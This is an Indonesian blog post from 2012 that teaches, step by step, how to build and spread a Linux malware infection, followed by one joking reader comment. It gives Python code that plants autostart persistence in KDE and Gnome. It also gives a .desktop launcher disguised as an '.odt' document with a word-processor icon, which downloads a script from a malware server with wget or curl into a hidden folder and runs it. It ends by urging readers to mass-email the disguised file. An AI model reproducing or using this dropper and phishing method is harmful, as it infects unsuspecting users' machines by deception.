Rabu, 04 April 2012

Lima cara menulis script virus di LINUX

1.Menulis sepotong malware pilihan anda. kita menggunakan skrip Python karena Bahasa yang baik, kode efisien, pra-instal di sebagian besar distro Linux dan kuat standard library support (misalnya, libraries for sending HTTP dan penanganan SMTP adalah bagian dari sebagian besar standar instalasi linux).

2.Malware anda membutuhkan kemampuan untuk menginstal sebuah launcher untuk dirinya sendiri sehingga setiap kali ada pengguna yang login Seperti disebutkan yang pertama, untuk Gnome yang berarti menciptakan sebuah launcher deskripsi pada folder
~ / .config / autostart.
Untuk KDE hanya link ke executable dari dalam direktori
~ / .kde / Autostart.
Untuk melakukan itu kode malware dapat memaksa issue dan menyalin launcher atau link ke dirinya ke kedua lokasi.

Inilah mantra malware untuk KDE, gunakan pemograman bahasa Python :

import os
uname = os.getlogin()
drop_dir = “/home/%s/.kde/Autostart” % uname)
os.makedirs(drop_dir)
os.symlink("/home/%s/.local/.hidden/s.py" % uname, drop_dir+“/s.py"))

dan inilah mantra untuk Gnome, gunakan pemograman bahasa Python

import os
relauncher_str = """
[Desktop Entry]
Type=Application
Name=Malware
Exec=python .local/.hidden/s.py
Icon=system-run
"""
uname = os.getlogin()
drop_dir = “/home/%s/.config/autostart” % uname
os.makedirs(drop_dir)
f = open(drop_dir+”/Malware.desktop”, “w”)
f.write(relauncher_str)
f.close()

kedua script diatas memungkinkan malware bisa autostart saat pertama kali di jalankan

3.Sekarang membuat launcher desktop file installer dari malware, yang mana berbeda dari launcher yang kita gunakan untuk me-restart malware setelah reboot. launcher desktop untuk installer kita kirim sebagai lampiran dalam email kepada pengguna yang ditargetkan. Pada saat malware tersebut di klik maka akan tersimpan dalam direktori seperti yang di jelaskan diatas

ini adalah mantra untuk launcher desktop file installer dari malware yang kita buat sebelumnya

[Desktop Entry]
Type=Application
Name=some_text.odt
Exec=bash -c 'URL=http://www.my_malware_server.com/s.py ;
DROP=~/.local/.hidden ;
mkdir -p $DROP;
if [ -e /usr/bin/wget ] ;
then wget $URL -O $DROP/s.py ;
else curl $URL -o $DROP/s.py ; fi;
python $DROP/s.py'
Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png

Penjelasannya script :
Bahwa kita telah menetapkan nama yang tidak berbahaya dan bahkan memilih dan mencari sebuah ikon yang membuatnya tampak seperti dokumen normal (ikon khusus yang terdapat pada sistem Ubuntu (Gnome) dan Kubuntu (KDE) , tetapi tidak mengganggu pada Fedora).

Pada baris Exec agak sedikit lebih lama, karena kita harus memperhitungkan kemungkinan bahwa salah satu wget diinstal atau curl. Sebagai contoh, sistem Ubuntu biasanya memiliki wget, sementara Fedora dengan curl. Jadi, kami melewati perintah yang sesuai untuk bash untuk memeriksa mana yang ada dan kemudian memanggil perintah yang benar untuk men-download malware. Ane bukan ahli bash, jadi mungkin ada yang jauh lebih efisien untuk melakukan hal ini. Juga, dalam baris kami menciptakan lokasi yang baik untuk skrip ($ DROP), yang tersembunyi. Perintah mkdir dengan option-p akan diam-diam membuat direktori induk apa pun yang diperlukan. Direktori target user's home, mencari direktori lokal yang bersih dan bersembunyi di beberapa folder dan hanya dapat dilihat ketika menampilkan file yang tersembunyi. Direktori / tmp tentu saja bukanlah tempat yang baik untuk malware kita ini, karena hal ini dihapus setiap reboot.

Simpan file launcher ini dengan nama “some_text.odt.desktop” (tanpa tanda petik), ketika anda menempatkan ini pada desktop anda, akan terlihat bahwa Gnome atau KDE akan memperlakukannya dengan cara yang khusus, tidak menampilkan '. Desktop' extension. Jadi, file tersebut hanya muncul sebagai 'some_text.odt'. Tentu saja, itu juga berarti bahwa lampiran surat akan memiliki ekstensi yang sama.

4.Lampirkan file ini ke email target, yang mendorong para penerima untuk menyimpan dan membuka lampiran. Seperti dijelaskan, sekali itu telah disimpan itu hanya akan muncul sebagai 'some_text.odt' pada desktop pengguna. Dan dengan ikon yang kita pilih dalam deskripsi launcher yang akan tampak sangat berbahaya.

5.Kirim email ini ke sebanyak mungkin alamat email yang anda bisa dapatkan

Sebuah virus Linux dalam 5 langkah sederhana ini. Setiap pengguna yang menyimpan dan membuka lampiran yang telah anda kirim mereka akan mendapatkan diri mereka terinfeksi dengan malware script pilihan anda, yang kemudian juga ulang setiap kali user log in lagi.
Itu mudah, bukan?

Masih ada yang bingung???? Jadi intinya pahami bahasa pemograman phyton dan sistim dalam linux

1 komentar:

Jasa Pembuatan Website mengatakan...

kagak paham kwwwwwwwwwwwwwwwwwwwwwwkwkwkw

Ganti Warna

selamat datang pengunjung
Diberdayakan oleh Blogger.

Blog Archive

Search This Blog

Popular Posts